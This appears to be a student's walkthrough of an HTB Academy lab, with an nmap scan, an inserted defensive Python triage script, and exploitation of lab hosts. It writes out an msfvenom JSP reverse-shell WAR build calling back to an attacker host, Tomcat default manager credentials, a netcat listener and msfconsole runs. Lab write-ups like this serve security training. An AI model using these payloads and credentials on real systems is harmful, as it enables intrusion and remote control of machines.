The Live Engagement
April 30, 2024

First we log in to the IP address that was given:
RDP to 10.129.86.5 with user "htb-student" and password "HTB_@cademy_stdnt!"

We start with an nmap scan of the first host, 172.16.1.11:
# Nmap 7.92 scan initiated Tue Apr 30 02:56:03 2024 as: nmap -sC -sV -oN firsthost.nmap 172.16.1.11
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.026s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
515/tcp open printer Microsoft lpd
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2024-04-29T06:08:54
|_Not valid after: 2024-10-29T06:08:54
|_ssl-date: 2024-04-30T06:57:03+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: SHELLS-WINSVR
| NetBIOS_Domain_Name: SHELLS-WINSVR
| NetBIOS_Computer_Name: SHELLS-WINSVR
| DNS_Domain_Name: shells-winsvr
| DNS_Computer_Name: shells-winsvr
| Product_Version: 10.0.17763
|_ System_Time: 2024-04-30T06:56:57+00:00
8080/tcp open http Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/10.0.11
|_http-favicon: Apache Tomcat
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: shells-winsvr
| NetBIOS computer name: SHELLS-WINSVR\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-04-29T23:56:57-07:00
| smb2-time:
| date: 2024-04-30T06:56:57
|_ start_date: N/A
|_clock-skew: mean: 1h23m59s, deviation: 3h07m49s, median: -1s
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:17:44 (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Apr 30 02:57:03 2024 -- 1 IP address (1 host up) scanned in 59.90 seconds
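As an added, defender-side example that is not part of the original writeup, the following Python script parses nmap -oN output like the scan above and flags the findings a blue team would want to remediate (SMB signing not required, HTTP TRACE enabled, Tomcat and RDP exposed). The sample text is a constructed excerpt of the scan; the port-to-advice table is an assumption for illustration.

```python
import re

# Constructed excerpt of the nmap -oN output shown above (enough for the parser).
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
3389/tcp open ms-wbt-server Microsoft Terminal Services
8080/tcp open http Apache Tomcat 10.0.11
| smb2-security-mode:
|_ Message signing enabled but not required
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# Matches an open-port line: "<port>/<proto> open <service> <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Services whose exposure on an internal host warrants review (assumed table).
WATCHED_PORTS = {
    445: "SMB exposed; confirm signing is required and guest access is off",
    3389: "RDP exposed; require NLA and restrict source networks",
    8080: "Tomcat exposed; ensure /manager is not reachable with default credentials",
}

def parse_open_ports(text):
    """Return [(port, service, version)] for each open-port line in the scan."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            ports.append((int(m.group(1)), m.group(3), m.group(4).strip()))
    return ports

def triage(text):
    """Return the findings a defender would want to act on, as strings."""
    findings = []
    for port, service, version in parse_open_ports(text):
        if port in WATCHED_PORTS:
            findings.append(f"{port}/{service} ({version}): {WATCHED_PORTS[port]}")
    if "Potentially risky methods: TRACE" in text:
        findings.append("HTTP TRACE enabled: disable it on IIS to avoid cross-site tracing")
    if "Message signing enabled but not required" in text:
        findings.append("SMB signing not required: enforce it via Group Policy to block relay")
    if "message_signing: disabled" in text:
        findings.append("SMB1 signing disabled: disable SMB1 or enforce signing")
    return findings
```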
Then we search for an exploit for the Tomcat web server.


But it failed.

It tried both IPs but still failed.



Then we change the payload for the exploit:
msfvenom -l payloads | grep java

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=9001 -f war -o shell.war


Click the Manager App and log in with:
User - tomcat
Pass - Tomcatadm

Upload the war file.



After several attempts to upload the war reverse shell, it succeeded.

Set up a listener and access the shell:
nc -lnvp 9001


Second host - 172.16.1.12 or blog.inlanefreight.local




Use reload_all to refresh the modules in msfconsole:
reload_all



run
shell
cat /customscripts/flag.txt

Third host - 172.16.1.13


use 1
options
set rhost 172.16.1.13
set lhost 172.16.1.5

run


